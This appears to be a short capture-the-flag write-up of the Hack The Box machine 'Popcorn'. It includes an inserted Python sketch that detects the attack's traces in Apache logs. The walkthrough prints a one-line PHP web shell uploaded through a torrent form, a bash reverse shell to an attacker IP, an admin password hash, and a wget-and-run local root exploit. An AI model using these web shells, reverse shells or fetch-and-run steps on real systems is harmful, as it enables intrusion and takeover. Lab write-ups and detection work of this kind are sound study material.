Popcorn

Port Scan

$ sudo nmap 10.129.20.243 -p- --min-rate=10000 -T4 -sCV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web App

echo 10.129.20.243 popcorn.htb | sudo tee -a /etc/hosts

$ feroxbuster -u http://popcorn.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --threads=50 -k -C 404

301      GET        9l       28w      312c http://popcorn.htb/torrent => http://popcorn.htb/torrent/
200      GET      656l     3113w    47460c http://popcorn.htb/test.php
200      GET      658l     3123w    47575c http://popcorn.htb/test
301      GET        9l       28w      318c http://popcorn.htb/torrent/admin => http://popcorn.htb/torrent/admin/
200      GET      106l      206w     2988c http://popcorn.htb/torrent/admin/admin

http://popcorn.htb/torrent/login.php

http://popcorn.htb/torrent/torrents.php?mode=upload

Went to the official Kali website and downloaded a torrent file, then uploaded it to the website.

<?php system($_GET[x]); ?>

# url encode
bash -c 'bash -i >& /dev/tcp/10.10.14.215/4445 0>&1'
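
Seen from the web server's side, the two steps above leave a recognisable trace in the Apache access log: a GET to a PHP file whose `x` parameter URL-decodes to a shell command. The following detection sketch is an added example, not part of the original write-up; the log lines, client addresses and the `UPLOAD_DIR/PLACEHOLDER.php` path are constructed, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines; path and addresses are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /torrent/index.php?mode=directory HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:07 +0000] "GET /torrent/UPLOAD_DIR/PLACEHOLDER.php?x=id HTTP/1.1" 200 54 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:00:19 +0000] "GET /torrent/UPLOAD_DIR/PLACEHOLDER.php?x=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F198.51.100.7%2F4445%200%3E%261%27 HTTP/1.1" 200 0 "-" "curl/8.0"
192.0.2.44 - - [01/Jan/2024:10:01:02 +0000] "GET /torrent/torrents.php?mode=upload HTTP/1.1" 200 7311 "-" "Mozilla/5.0"
"""

# Hypothetical rule names; each regex is applied to the URL-decoded parameter value.
SUSPICIOUS = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
    "interactive_shell": re.compile(r"\b(?:ba|da|z)?sh\s+-(?:i|c)\b"),
    "recon_command": re.compile(r"^\s*(?:id|whoami|uname(?:\s+-a)?)\s*$"),
}

# client, identd, user, [timestamp], "METHOD target PROTOCOL"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')


def scan(log_text):
    """Return (client, timestamp, path, parameter, sorted rule names) per hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # malformed or non-request line
        client, when, _method, target = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes each value, so encoded payloads are matched in clear
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            rules = sorted(r for r, rx in SUSPICIOUS.items() if rx.search(value))
            if rules:
                hits.append((client, when, url.path, name, rules))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only GET parameters reach the access log; the same command sent in a POST body would need request-body logging or a WAF rule to be seen.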

George

# /var/www/torrent/database/th_database.sql
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', 'admin@yourdomain.com', '2007-01-06 21:12:46', '2007-01-06 21:12:46');

motd.legal-displayed

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

$ wget http://10.10.14.215/localroot.sh -O test.sh

$ python -c "import pty;pty.spawn('/bin/bash');"

$ bash test.sh
